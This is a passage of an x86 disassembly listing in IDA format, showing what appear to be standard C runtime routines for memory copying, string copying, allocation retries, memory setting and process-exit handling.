mov [edi+ecx*4+8], eax
loc_407664: ; DATA XREF: sub_407370+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407677: ; CODE XREF: sub_407370+1EE�j
; DATA XREF: sub_407370:off_407630�o
jmp ds:off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407680 dd offset loc_407690 ; DATA XREF: sub_407370+1E3�r
; sub_407370:loc_407580�r ...
dd offset loc_407698
dd offset loc_4076A8
dd offset loc_4076BC
; ---------------------------------------------------------------------------
loc_407690: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407698: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076A8: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076BC: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407370 endp
; =============== S U B R O U T I N E =======================================
sub_4076D5 proc near ; CODE XREF: sub_402C0C+31�p
; sub_402C72+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_4076EA
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_407705
loc_4076EA: ; CODE XREF: sub_4076D5+B�j
; sub_4076D5+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_4076F4: ; CODE XREF: sub_4076D5+5D�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_407736
; ---------------------------------------------------------------------------
loc_407705: ; CODE XREF: sub_4076D5+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_407711
mov [ecx], bl
jmp short loc_4076EA
; ---------------------------------------------------------------------------
loc_407711: ; CODE XREF: sub_4076D5+36�j
mov edx, ecx
loc_407713: ; CODE XREF: sub_4076D5+49�j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_407720
dec edi
jnz short loc_407713
loc_407720: ; CODE XREF: sub_4076D5+46�j
cmp edi, ebx
jnz short loc_407734
mov [ecx], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_4076F4
; ---------------------------------------------------------------------------
loc_407734: ; CODE XREF: sub_4076D5+4D�j
xor eax, eax
loc_407736: ; CODE XREF: sub_4076D5+2E�j
pop edi
pop esi
pop ebx
retn
sub_4076D5 endp
; =============== S U B R O U T I N E =======================================
sub_40773A proc near ; CODE XREF: sub_404C69+3B�p
; sub_405934+48�p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_40773E: ; CODE XREF: sub_40773A+39�j
push [esp+8+arg_0]
call sub_4036E0
mov edi, eax
test edi, edi
pop ecx
jnz short loc_407775
cmp dword_425F70, eax
jbe short loc_407775
push esi
call ds:dword_41D0FC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_425F70
jbe short loc_40776E
or eax, 0FFFFFFFFh
loc_40776E: ; CODE XREF: sub_40773A+2F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40773E
loc_407775: ; CODE XREF: sub_40773A+12�j
; sub_40773A+1A�j
mov eax, edi
pop edi
pop esi
retn
sub_40773A endp
; =============== S U B R O U T I N E =======================================
sub_40777A proc near ; CODE XREF: sub_402DB6+5�p
; sub_40531A+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_40777E: ; CODE XREF: sub_40777A+41�j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D94F
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_4077BD
cmp dword_425F70, eax
jbe short loc_4077BD
push esi
call ds:dword_41D0FC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_425F70
jbe short loc_4077B6
or eax, 0FFFFFFFFh
loc_4077B6: ; CODE XREF: sub_40777A+37�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40777E
loc_4077BD: ; CODE XREF: sub_40777A+1A�j
; sub_40777A+22�j
mov eax, edi
pop edi
pop esi
retn
sub_40777A endp
; =============== S U B R O U T I N E =======================================
sub_4077C2 proc near ; CODE XREF: sub_402D09+58�p
; sub_402D09+6F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_4077C6: ; CODE XREF: sub_4077C2+44�j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40DA6D
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_407808
cmp [esp+8+arg_4], eax
jz short loc_407808
cmp dword_425F70, eax
jbe short loc_407808
push esi
call ds:dword_41D0FC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_425F70
jbe short loc_407801
or eax, 0FFFFFFFFh
loc_407801: ; CODE XREF: sub_4077C2+3A�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_4077C6
loc_407808: ; CODE XREF: sub_4077C2+17�j
; sub_4077C2+1D�j ...
mov eax, edi
pop edi
pop esi
retn
sub_4077C2 endp
; =============== S U B R O U T I N E =======================================
sub_40780D proc near ; CODE XREF: sub_408DD8+40�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
xor esi, esi
loc_407811: ; CODE XREF: sub_40780D+49�j
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40DC88
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_407858
cmp [esp+8+arg_8], eax
jz short loc_407858
cmp dword_425F70, eax
jbe short loc_407858
push esi
call ds:dword_41D0FC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_425F70
jbe short loc_407851
or eax, 0FFFFFFFFh
loc_407851: ; CODE XREF: sub_40780D+3F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_407811
loc_407858: ; CODE XREF: sub_40780D+1C�j
; sub_40780D+22�j ...
mov eax, edi
pop edi
pop esi
retn
sub_40780D endp
; =============== S U B R O U T I N E =======================================
sub_40785D proc near ; CODE XREF: .text:0040403F�p
; .text:00404065�p ...
arg_0 = dword ptr 4
call sub_409C54
push [esp+arg_0]
call sub_409AB4
push off_423930
call sub_405193
push 0FFh
call eax
add esp, 0Ch
retn
sub_40785D endp
; =============== S U B R O U T I N E =======================================
sub_407881 proc near ; CODE XREF: sub_4078A7+4�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41D0E4 ; GetModuleHandleA
test eax, eax
jz short locret_4078A6
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_41D0EC ; GetProcAddress
test eax, eax
jz short locret_4078A6
push [esp+arg_0]
call eax
locret_4078A6: ; CODE XREF: sub_407881+D�j
; sub_407881+1D�j
retn
sub_407881 endp
; =============== S U B R O U T I N E =======================================
sub_4078A7 proc near ; CODE XREF: sub_4036E0+34�p
; sub_403ED3+1C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_407881
pop ecx
push [esp+arg_0]
call ds:dword_41D050 ; ExitProcess
int 3 ; Trap to Debugger
sub_4078A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4078BC proc near ; CODE XREF: sub_402DE5+C�p
push 8
call sub_4059F7
pop ecx
retn
sub_4078BC endp
; =============== S U B R O U T I N E =======================================
sub_4078C5 proc near ; CODE XREF: sub_402E1B�p
push 8
call sub_40591F
pop ecx
retn
sub_4078C5 endp
; =============== S U B R O U T I N E =======================================
sub_4078CE proc near ; CODE XREF: sub_407A0B+78�p
; sub_407A0B+88�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_4078DE
; ---------------------------------------------------------------------------
loc_4078D3: ; CODE XREF: sub_4078CE+14�j
mov eax, [esi]
test eax, eax
jz short loc_4078DB
call eax
loc_4078DB: ; CODE XREF: sub_4078CE+9�j
add esi, 4
loc_4078DE: ; CODE XREF: sub_4078CE+3�j
cmp esi, [esp+4+arg_0]
jb short loc_4078D3
pop esi
retn
sub_4078CE endp
; =============== S U B R O U T I N E =======================================
sub_4078E6 proc near ; CODE XREF: sub_407979+32�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_4078FE
; ---------------------------------------------------------------------------
loc_4078EF: ; CODE XREF: sub_4078E6+1C�j
test eax, eax
jnz short loc_407904
mov ecx, [esi]
test ecx, ecx
jz short loc_4078FB
call ecx
loc_4078FB: ; CODE XREF: sub_4078E6+11�j
add esi, 4
loc_4078FE: ; CODE XREF: sub_4078E6+7�j
cmp esi, [esp+4+arg_4]
jb short loc_4078EF
loc_407904: ; CODE XREF: sub_4078E6+B�j
pop esi
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
sub_407906 proc near ; CODE XREF: sub_405A28+12�p
; sub_40CB14+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_40792E
loc_407911: ; CODE XREF: sub_407906+2F�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40792E: ; CODE XREF: sub_407906+9�j
mov eax, dword_425F78
cmp eax, esi
jz short loc_407911
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_407906 endp
; =============== S U B R O U T I N E =======================================
sub_40793D proc near ; CODE XREF: sub_405A28+2D�p
; sub_40F524+11F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_407965
loc_407948: ; CODE XREF: sub_40793D+2E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_407965: ; CODE XREF: sub_40793D+9�j
cmp dword_425F78, esi
jz short loc_407948
mov ecx, dword_425F84
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_40793D endp
; =============== S U B R O U T I N E =======================================
sub_407979 proc near ; CODE XREF: .text:0040407D�p
arg_0 = dword ptr 4
cmp ds:off_41ED94, 0
jz short loc_40799C
push offset off_41ED94
call sub_40CC52
test eax, eax
pop ecx
jz short loc_40799C
push [esp+arg_0]
call ds:off_41ED94
pop ecx
loc_40799C: ; CODE XREF: sub_407979+7�j
; sub_407979+16�j
call sub_40D59E
push offset dword_41D2D8
push offset dword_41D2BC
call sub_4078E6
test eax, eax
pop ecx
pop ecx
jnz short locret_407A0A
push esi
push edi
push offset sub_40B066
call sub_402E21
mov esi, offset dword_41D288
mov eax, esi
mov edi, offset dword_41D2B8
cmp eax, edi
pop ecx
jnb short loc_4079E2
loc_4079D3: ; CODE XREF: sub_407979+67�j
mov eax, [esi]
test eax, eax
jz short loc_4079DB
call eax
loc_4079DB: ; CODE XREF: sub_407979+5E�j
add esi, 4
cmp esi, edi
jb short loc_4079D3
loc_4079E2: ; CODE XREF: sub_407979+58�j
cmp dword_434DD8, 0
pop edi
pop esi
jz short loc_407A08
push offset dword_434DD8
call sub_40CC52
test eax, eax
pop ecx
jz short loc_407A08
push 0
push 2
push 0
call dword_434DD8
loc_407A08: ; CODE XREF: sub_407979+72�j
; sub_407979+81�j
xor eax, eax
locret_407A0A: ; CODE XREF: sub_407979+3B�j
retn
sub_407979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A0B proc near ; CODE XREF: sub_407AD9+8�p
; sub_407AEA+8�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00407AD3 SIZE 00000006 BYTES
push 0Ch
push offset dword_4214F8
call __SEH_prolog4
push 8
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
xor esi, esi
inc esi
cmp dword_425FB8, esi
jz short loc_407A99
mov dword_425FB4, esi
mov al, byte ptr [ebp+arg_8]
mov byte_425FB0, al
cmp [ebp+arg_4], 0
jnz short loc_407A89
push dword_434DD0
call sub_405193
mov edi, eax
push dword_434DCC
call sub_405193
pop ecx
pop ecx
mov [ebp+var_1C], eax
test edi, edi
jz short loc_407A79
loc_407A63: ; CODE XREF: sub_407A0B+68�j
; sub_407A0B+6C�j
sub [ebp+var_1C], 4
cmp [ebp+var_1C], edi
jb short loc_407A79
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_407A63
call eax
jmp short loc_407A63
; ---------------------------------------------------------------------------
loc_407A79: ; CODE XREF: sub_407A0B+56�j
; sub_407A0B+5F�j
push offset dword_41D2E8
mov eax, offset dword_41D2DC
call sub_4078CE
pop ecx
loc_407A89: ; CODE XREF: sub_407A0B+35�j
push offset dword_41D2F4
mov eax, offset dword_41D2EC
call sub_4078CE
pop ecx
loc_407A99: ; CODE XREF: sub_407A0B+21�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407AC4
cmp [ebp+arg_8], 0
jnz short loc_407AD3
mov dword_425FB8, esi
push 8
call sub_40591F
pop ecx
push [ebp+arg_0]
call sub_4078A7
loc_407AC1: ; DATA XREF: .rdata:00421510�o
xor esi, esi
inc esi
sub_407A0B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_407AC4 proc near ; CODE XREF: sub_407A0B+95�p
cmp dword ptr [ebp+10h], 0
jz short locret_407AD2
push 8
call sub_40591F
pop ecx
locret_407AD2: ; CODE XREF: sub_407AC4+4�j
retn
sub_407AC4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_407A0B
loc_407AD3: ; CODE XREF: sub_407A0B+9E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_407A0B
; =============== S U B R O U T I N E =======================================
sub_407AD9 proc near ; CODE XREF: .text:004040B9�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AD9 endp
; =============== S U B R O U T I N E =======================================
sub_407AEA proc near ; CODE XREF: .text:004040E9�p
; sub_40DD29+D9�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_407A0B
add esp, 0Ch
retn
sub_407AEA endp
; =============== S U B R O U T I N E =======================================
sub_407AFB proc near ; CODE XREF: .text:loc_4040BE�p
push 1
push 0
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407AFB endp
; =============== S U B R O U T I N E =======================================
sub_407B0A proc near ; CODE XREF: .text:loc_4040EE�p
push 1
push 1
push 0
call sub_407A0B
add esp, 0Ch
retn
sub_407B0A endp
; =============== S U B R O U T I N E =======================================
sub_407B19 proc near ; CODE XREF: sub_4054D6+C4�p
push esi
call sub_40518A
mov esi, eax
push esi
call sub_408058
push esi
call sub_40CAFA
push esi
call sub_402E33
push esi
call sub_40DEE3
push esi
call sub_40DED9
push esi
call sub_40DCCF
push esi
call nullsub_2
push esi
call sub_40BEDC
push offset sub_407AEA
call sub_405127
add esp, 24h
mov off_423930, eax
pop esi
retn
sub_407B19 endp
; =============== S U B R O U T I N E =======================================
sub_407B65 proc near ; CODE XREF: sub_402E3D+CE�p
; sub_402F39+18�p ...
and dword_434DC4, 0
retn
sub_407B65 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407B70 proc near ; CODE XREF: sub_40177B+4A�p
; sub_40177B+5E�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_407BE5
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_407B9C
cmp edx, 100h
jb short loc_407B9C
cmp dword_433C7C, 0
jz short loc_407B9C
jmp sub_40DF44
; ---------------------------------------------------------------------------
loc_407B9C: ; CODE XREF: sub_407B70+14�j
; sub_407B70+1C�j ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_407BD5
neg ecx
and ecx, 3
jz short loc_407BB7
sub edx, ecx
loc_407BAD: ; CODE XREF: sub_407B70+45�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_407BAD
loc_407BB7: ; CODE XREF: sub_407B70+39�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_407BD5
rep stosd
test edx, edx
jz short loc_407BDF
loc_407BD5: ; CODE XREF: sub_407B70+32�j
; sub_407B70+5D�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_407BD5
loc_407BDF: ; CODE XREF: sub_407B70+63�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_407BE5: ; CODE XREF: sub_407B70+A�j
mov eax, [esp+arg_0]
retn
sub_407B70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF0 proc near ; CODE XREF: sub_402F72+43�p
; sub_408DD8+35�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407C10
cmp edi, eax
jb loc_407DB4
loc_407C10: ; CODE XREF: sub_407BF0+16�j
cmp ecx, 100h
jb short loc_407C37
cmp dword_433C7C, 0
jz short loc_407C37
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_407C37
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_407C37: ; CODE XREF: sub_407BF0+26�j
; sub_407BF0+2F�j ...
test edi, 3
jnz short loc_407C54
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp ds:off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C54: ; CODE XREF: sub_407BF0+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_407C6C
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_407C74+4[eax*4]
; ---------------------------------------------------------------------------
loc_407C6C: ; CODE XREF: sub_407BF0+6E�j
jmp dword ptr ds:loc_407D74[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407C74: ; CODE XREF: sub_407BF0+58�j
; sub_407BF0+B6�j ...
jmp ds:off_407CF8[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407C88
dd offset loc_407CB4
; ---------------------------------------------------------------------------
fdivr dword ptr [eax+eax*2+0]
loc_407C88: ; DATA XREF: sub_407BF0+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp ds:off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407CB4: ; DATA XREF: sub_407BF0+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp ds:off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_407C74
rep movsd
jmp ds:off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407CF8 dd offset loc_407D5B ; DATA XREF: sub_407BF0:loc_407C74�r
dd offset loc_407D48
dd offset loc_407D40
dd offset loc_407D38
dd offset loc_407D30
dd offset loc_407D28
dd offset loc_407D20
dd offset loc_407D18
; ---------------------------------------------------------------------------
loc_407D18: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_407D20: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_407D28: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_407D30: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_407D38: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_407D40: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_407D48: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407D5B: ; CODE XREF: sub_407BF0:loc_407C74�j
; DATA XREF: sub_407BF0:off_407CF8�o
jmp ds:off_407D64[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407D64 dd offset loc_407D74 ; DATA XREF: sub_407BF0+5C�r
; sub_407BF0+BA�r ...
dd offset loc_407D7C
dd offset loc_407D88
dd offset loc_407D9C
; ---------------------------------------------------------------------------
loc_407D74: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D7C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D88: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407D9C: ; CODE XREF: sub_407BF0+5C�j
; sub_407BF0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407DB4: ; CODE XREF: sub_407BF0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407DE8
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp ds:off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DDC: ; CODE XREF: sub_407BF0+1DD�j
; sub_407BF0+238�j ...
neg ecx
jmp ds:off_407EB0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407DE8: ; CODE XREF: sub_407BF0+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407E00
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_407E00+4[eax*4]
; ---------------------------------------------------------------------------
loc_407E00: ; CODE XREF: sub_407BF0+202�j
; DATA XREF: sub_407BF0+209�r
jmp ds:off_407F00[ecx*4]
; ---------------------------------------------------------------------------
align 4
adc al, 7Eh
inc eax
add [eax], bh
jle short loc_407E4F
add [eax+7Eh], ah
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp ds:off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
loc_407E4F: ; CODE XREF: sub_407BF0+21D�j
cmp ecx, 8
jb short loc_407DDC
std
rep movsd
cld
jmp ds:off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_407DDC
std
rep movsd
cld
jmp ds:off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407EB4
dd offset loc_407EBC
dd offset loc_407EC4
dd offset loc_407ECC
dd offset loc_407ED4
dd offset loc_407EDC
dd offset loc_407EE4
off_407EB0 dd offset loc_407EF7 ; DATA XREF: sub_407BF0+1EE�r
; ---------------------------------------------------------------------------
loc_407EB4: ; DATA XREF: sub_407BF0+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_407EBC: ; DATA XREF: sub_407BF0+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407EC4: ; DATA XREF: sub_407BF0+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_407ECC: ; DATA XREF: sub_407BF0+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407ED4: ; DATA XREF: sub_407BF0+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_407EDC: ; DATA XREF: sub_407BF0+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407EE4: ; DATA XREF: sub_407BF0+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407EF7: ; CODE XREF: sub_407BF0+1EE�j
; DATA XREF: sub_407BF0:off_407EB0�o
jmp ds:off_407F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407F00 dd offset loc_407F10 ; DATA XREF: sub_407BF0+1E3�r
; sub_407BF0:loc_407E00�r ...
dd offset loc_407F18
dd offset loc_407F28
dd offset loc_407F3C
; ---------------------------------------------------------------------------
loc_407F10: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F18: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F28: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407F3C: ; CODE XREF: sub_407BF0+1E3�j
; sub_407BF0:loc_407E00�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F55 proc near ; CODE XREF: sub_402FED+7�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421518
call __SEH_prolog4
push 0Eh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_407FA6
mov eax, dword_425FC0
mov edx, offset dword_425FBC
loc_407F81: ; CODE XREF: sub_407F55+65�j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_407F99
cmp [eax], ecx
jnz short loc_407FB8
mov ecx, [eax+4]
mov [edx+4], ecx
push eax
call sub_403603
pop ecx
loc_407F99: ; CODE XREF: sub_407F55+31�j
push dword ptr [esi+4]
call sub_403603
pop ecx
and dword ptr [esi+4], 0
loc_407FA6: ; CODE XREF: sub_407F55+20�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_407FBC
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_407FB8: ; CODE XREF: sub_407F55+35�j
mov edx, eax
jmp short loc_407F81
sub_407F55 endp
; =============== S U B R O U T I N E =======================================
sub_407FBC proc near ; CODE XREF: sub_407F55+58�p
; DATA XREF: .rdata:00421530�o
push 0Eh
call sub_40591F
pop ecx
retn
sub_407FBC endp
